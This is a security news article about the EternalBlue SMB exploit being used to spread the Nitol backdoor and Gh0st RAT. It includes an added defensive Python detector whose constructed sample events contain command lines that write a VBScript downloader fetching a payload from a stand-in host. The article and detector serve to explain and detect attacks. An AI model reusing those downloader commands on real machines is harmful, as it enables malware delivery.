The now-infamous EternalBlue exploit deployed in the WannaCry ransomware outbreak and in the distribution of the Adylkuzz miner is now being used to deliver the Nitol backdoor and Gh0st RAT. Both threats have been around for several years and are once again included in malicious operations.
The SMB Flaw from WannaCry and Adylkuzz Campaigns Deployed Once Again
FireEye researchers say that the criminals behind this campaign are once again using the very same SMB flaw (MS17-010) that was leveraged for the distribution of WannaCry.
“We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” FireEye researchers recently shared.
More about Gh0st RAT
As already mentioned, the RAT has been deployed in various malicious operations for many years. Interestingly, its primary use is as a nation-state tool for APT attacks against government agencies and politically-engaged targets. Gh0st RAT was also one of the backdoors searched for by Malware Hunter, the “specialized Shodan crawler that explores the Internet looking for command & control (C2s) servers for botnets”.
More about Backdoor.Nitol
Nitol, or Backdoor.Nitol, has been part of operations built upon a remote code execution flaw that uses the ADODB.Stream ActiveX Object and affects older versions of Internet Explorer, FireEye researchers say. Interestingly, both Nitol and Gh0st have been distributed via the CVE-2014-6332 vulnerability and in spam campaigns targeting PowerShell commands.
The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell, writes instructions into a VBScript file, and then executes that file to fetch the payload from another server.
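The post-exploitation sequence described above (a shell writing a .vbs file and then a script host running it) is something a defender can correlate in process-creation telemetry. The following detector is an added example, not code from the article or from FireEye; the event records and command lines are constructed, and the field names (host, pid, image, cmd) are assumptions about a Sysmon-style event feed.

```python
import re
from typing import Dict, List

# A Windows path ending in .vbs inside a command line.
VBS_PATH = re.compile(r'([A-Za-z]:\\[^\s">]+\.vbs)', re.IGNORECASE)
# A shell writing script text with an echo redirection: echo ... > file.vbs (or >>).
ECHO_WRITE = re.compile(r'echo\s.*>+\s*"?([A-Za-z]:\\[^\s">]+\.vbs)', re.IGNORECASE)
SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")


def detect_vbs_droppers(events: List[Dict]) -> List[Dict]:
    """Correlate 'cmd.exe echoes text into a .vbs' with 'a script host executes that .vbs'.

    Events are assumed to be in chronological order. A script run on its own (e.g. a logon
    script) does not alert; only a .vbs that a shell on the same host wrote first does.
    """
    written = {}  # (host, lowercased path) -> pid of the shell that last wrote the file
    alerts = []
    for ev in events:
        image, cmd = ev["image"].lower(), ev["cmd"]
        if image == "cmd.exe":
            m = ECHO_WRITE.search(cmd)
            if m:
                written[(ev["host"], m.group(1).lower())] = ev["pid"]
        elif image in SCRIPT_HOSTS:
            m = VBS_PATH.search(cmd)
            if m and (ev["host"], m.group(1).lower()) in written:
                alerts.append({"host": ev["host"], "script": m.group(1),
                               "writer_pid": written[(ev["host"], m.group(1).lower())],
                               "exec_pid": ev["pid"]})
    return alerts


# Constructed sample events: two echo writes and an execution on lab-01, one benign logon script on ws-07.
SAMPLE_EVENTS = [
    {"host": "lab-01", "pid": 1204, "image": "cmd.exe",
     "cmd": r'cmd.exe /c echo Set x=CreateObject("MSXML2.XMLHTTP") > C:\Windows\Temp\1.vbs'},
    {"host": "lab-01", "pid": 1208, "image": "cmd.exe",
     "cmd": r'cmd.exe /c echo x.Open "GET","http://example.invalid/p.bin",0 >> C:\Windows\Temp\1.vbs'},
    {"host": "lab-01", "pid": 1212, "image": "cscript.exe", "cmd": r"cscript.exe C:\Windows\Temp\1.vbs"},
    {"host": "ws-07", "pid": 3300, "image": "wscript.exe", "cmd": r"wscript.exe C:\Scripts\logon.vbs"},
]

if __name__ == "__main__":
    for alert in detect_vbs_droppers(SAMPLE_EVENTS):
        print(alert)
```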
Gh0st RAT Sample Signed with Stolen Certificate
According to researchers, the combination of EternalBlue and VBScript has been spreading Nitol in Singapore and Nitol in South Asia. Also, the samples acquired by FireEye were signed with a common digital certificate that is most likely stolen:
The Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye, are all signed with a common digital certificate purporting to be from 北京研创达科技有限公司 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.
In conclusion, the addition of EternalBlue to Metasploit has made things very easy for attackers to exploit these flaws. Researchers expect more threat groups to start leveraging the same vulnerabilities to deliver different payloads.